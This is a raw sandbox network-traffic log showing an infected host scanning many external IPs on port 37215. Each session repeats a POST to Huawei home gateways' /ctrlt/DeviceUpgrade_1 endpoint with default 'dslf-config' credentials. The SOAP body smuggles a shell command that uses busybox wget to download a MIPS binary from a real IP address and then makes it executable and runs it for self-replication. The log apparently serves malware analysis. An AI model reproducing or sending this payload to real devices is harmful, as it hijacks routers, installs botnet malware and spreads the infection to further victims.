                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          919192.168.2.233766641.218.206.22737215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.267092943 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          920192.168.2.2347220203.177.171.6237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.267098904 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          921192.168.2.234520241.80.205.15737215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.267112017 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          922192.168.2.2345820197.208.226.21237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.267384052 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          923192.168.2.234529041.50.64.17937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.267384052 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          924192.168.2.2345090157.127.176.2437215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.267406940 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          925192.168.2.2339070157.157.195.22737215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.267422915 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          926192.168.2.2333664157.122.111.22037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.267432928 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          927192.168.2.234107691.130.217.12137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.267443895 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          928192.168.2.234235241.165.2.11037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.267611027 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          929192.168.2.2346142197.45.48.2837215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.267612934 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
